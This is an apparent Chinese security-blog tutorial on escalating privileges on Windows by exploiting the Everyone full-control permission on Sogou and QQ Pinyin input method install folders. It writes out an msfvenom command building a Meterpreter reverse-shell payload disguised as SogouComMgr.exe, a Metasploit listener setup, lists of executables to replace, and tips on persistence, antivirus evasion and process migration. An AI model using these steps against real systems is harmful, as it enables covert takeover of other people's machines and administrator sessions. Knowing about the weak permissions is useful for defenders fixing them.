利用QQ和搜狗输入法进行提权

1337163122

声明：该公众号大部分文章来自作者日常学习笔记，也有少部分文章是经过原作者授权和其他公众号白名单转载，未经授权，严禁转载，如需转载，联系开白。 请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。

0x01 前言
搜狗拼音输入法是目前国内使用人数最多的一款，但仍然会存在一些安全问题，在安装过程中默认给了Everyone完全控制权限，Everyone为所有用户，也就是说我们可以对搜狗拼音输入法安装目录下的任何文件进行修改/删除和写入，所以能达到我们权限提升的目的。

虽然这种提权方式有些年头了，但不知道为什么搜狗一直没有修复这个问题。

0x02 测试环境

1. <pre data-cke-widget-keep-attr="0" data-widget="codeSnippet" class="cke_widget_element" data-cke-widget-data="{&quot;classes&quot;:[],&quot;lang&quot;:&quot;&quot;,&quot;code&quot;:&quot;操作系统：Windows Server 2016 Datacenter\n\n软件版本：搜狗拼音输入法 9.5.0.3517、QQ拼音输入法6.4.5804.400\n搜狗拼音默认安装路径：C:\\Program Files (x86)\\SogouInput\\\nQQ拼音默认安装路径：C:\\Program Files (x86)\\Tencent\\QQPinyin\\\n搜狗、QQ输入法进程名：SGTool.exe、SGDownload.exe、pinyinup.exe、SogouCloud.exe、SogouComMgr.exe、SGRender.exe、QQPYUserCenter.exe、QQPYLiveUp.exe、QQPYConfig.exe、QQPYToolbox.exe、QQPYCloud.exe......&quot;}"><code class="hljs">操作系统：Windows Server 2016 Datacenter
   
2. 
   
3. 软件版本：搜狗拼音输入法 9.5.0.3517、QQ拼音输入法6.4.5804.400
   
4. 搜狗拼音默认安装路径：C:\Program Files (x86)\SogouInput\
   
5. QQ拼音默认安装路径：C:\Program Files (x86)\Tencent\QQPinyin\
   
6. 搜狗、QQ输入法进程名：SGTool.exe、SGDownload.exe、pinyinup.exe、SogouCloud.exe、SogouComMgr.exe、SGRender.exe、QQPYUserCenter.exe、QQPYLiveUp.exe、QQPYConfig.exe、QQPYToolbox.exe、QQPYCloud.exe......</code></pre><span class="cke_reset cke_widget_drag_handler_container" style="background:rgba(220,220,220,0.5);background-image:url(https://csdnimg.cn/release/blog_editor_html/release1.6.19/ckeditor/plugins/widget/images/handle.png)"><img class="cke_reset cke_widget_drag_handler" data-cke-widget-drag-handler="1" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" width="15" title="点击并拖拽以移动" height="15" role="presentation"></span>

复制代码

​

0x03 搜狗拼音输入法
使用tasklist /svc命令查看搜狗相关进程，或者直接跳转到%ProgramFiles(x86)%目录下看是否安装的有搜狗输入法。
​

接着再用icacls命令查看搜狗输入法安装目录C:\Program Files (x86)\SogouInput\9.5.0.3517\的权限配置。
​
官方文档：https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc753525(v=ws.11)
​

确定搜狗输入法安装目录具备Everyone完全控制权限后就可以生成MSF攻击载荷并设置好相关参数执行监听，然后替换目标机器常用的搜狗相关文件，等管理员使用搜狗输入法时运行到我们替换的文件即可得到会话。

1. <pre data-cke-widget-keep-attr="0" data-widget="codeSnippet" class="cke_widget_element" data-cke-widget-data="{&quot;classes&quot;:[],&quot;lang&quot;:&quot;&quot;,&quot;code&quot;:&quot;root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.120 lport=443 -f exe > /var/www/html/SogouComMgr.exe\n\n\nmsf5 > use exploit/multi/handler\nmsf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp\nmsf5 exploit(multi/handler) > set lhost 192.168.0.120\nmsf5 exploit(multi/handler) > set lport 443\nmsf5 exploit(multi/handler) > set autorunscript post/windows/manage/migrate NAME=notepad.exe\nmsf5 exploit(multi/handler) > exploit&quot;}"><code class="hljs">root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.120 lport=443 -f exe > /var/www/html/SogouComMgr.exe
   
2. 
   
3. 
   
4. msf5 > use exploit/multi/handler
   
5. msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
   
6. msf5 exploit(multi/handler) > set lhost 192.168.0.120
   
7. msf5 exploit(multi/handler) > set lport 443
   
8. msf5 exploit(multi/handler) > set autorunscript post/windows/manage/migrate NAME=notepad.exe
   
9. msf5 exploit(multi/handler) > exploit</code></pre><span class="cke_reset cke_widget_drag_handler_container" style="background:rgba(220,220,220,0.5);background-image:url(https://csdnimg.cn/release/blog_editor_html/release1.6.19/ckeditor/plugins/widget/images/handle.png)"><img class="cke_reset cke_widget_drag_handler" data-cke-widget-drag-handler="1" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" width="15" title="点击并拖拽以移动" height="15" role="presentation"></span>

复制代码

其它搜狗拼音输入法可替换文件：

搜狗输入法 - 属性设置工具：

1. %ProgramFiles(x86)%\SogouInput\9.5.0.3517\SGTool.exe
   
2. 搜狗输入法 - 修复更新工具：
   
3. %ProgramFiles(x86)%\SogouInput\9.5.0.3517\SGDownload.exe
   
4. 搜狗输入法 - 网络更新程序：
   
5. %ProgramFiles(x86)%\SogouInput\9.5.0.3517\pinyinup.exe
   
6. 搜狗输入法 - 云计算代理：
   
7. %ProgramFiles(x86)%\SogouInput\9.5.0.3517\SogouCloud.exe
   
8. 搜狗输入法 - 云计算代理：
   
9. %ProgramFiles(x86)%\SogouInput\9.5.0.3517\SearchCand.dll
   
10. 搜狗输入法 - 工具箱：
    
11. %ProgramFiles(x86)%\SogouInput\Components\SogouComMgr.exe
    
12. 搜狗输入法 - 用户登录：
    
13. %ProgramFiles(x86)%\SogouInput\Components\SGRender\1.0.0.56\SGRender.exe

复制代码

​
​


0x04 搜狗拼音输入法
QQ拼音个人中心QQPYUserCenter.exe被我们替换后直接切换到QQ拼音输入法即可得到Meterpreter会话，其它文件可能还得等管理员执行相应操作后才能得到会话。​​​​​​​
QQ拼音输入法 - 个人中心：

1. %ProgramFiles(x86)%\Tencent\QQPinyin\6.4.5804.400\QQPYUserCenter.exe
   
2. QQ拼音输入法 - 升级工具：
   
3. %ProgramFiles(x86)%\Tencent\QQPinyin\6.4.5804.400\QQPYLiveUp.exe
   
4. QQ拼音输入法 - 属性设置：
   
5. %ProgramFiles(x86)%\Tencent\QQPinyin\6.4.5804.400\QQPYConfig.exe
   
6. QQ拼音输入法 - 工具箱：
   
7. %ProgramFiles(x86)%\Tencent\QQPinyin\6.4.5804.400\QQPYToolbox.exe
   
8. QQ拼音云输入 - 客户端：
   
9. %ProgramFiles(x86)%\Tencent\QQPinyin\6.4.5804.400\QQPYCloud.exe

复制代码

​


0x05 注意事项

• 如果目标机器为XP、2003系统的话我们就可以直接利用lpk.dll劫持来进行权限提升可能会更好；
  
• 替换文件前要先备份好我们要替换的搜狗拼音输入法相关文件，便于我们后期将其恢复到原始状态；
  
• 最终获取的Meterpreter会话权限取决于目标服务器登录的是哪个用户来执行我们的搜狗拼音输入法；
  
• 同时也可以利用目标机器上的搜狗、QQ等输入法来进行权限维持，有安全防护还得自己做下免杀处理；
  
• 防止替换后的文件在运行后就退出而导致Meterpreter会话断开，笔者建议用migrate模块注入到其它进程中运行；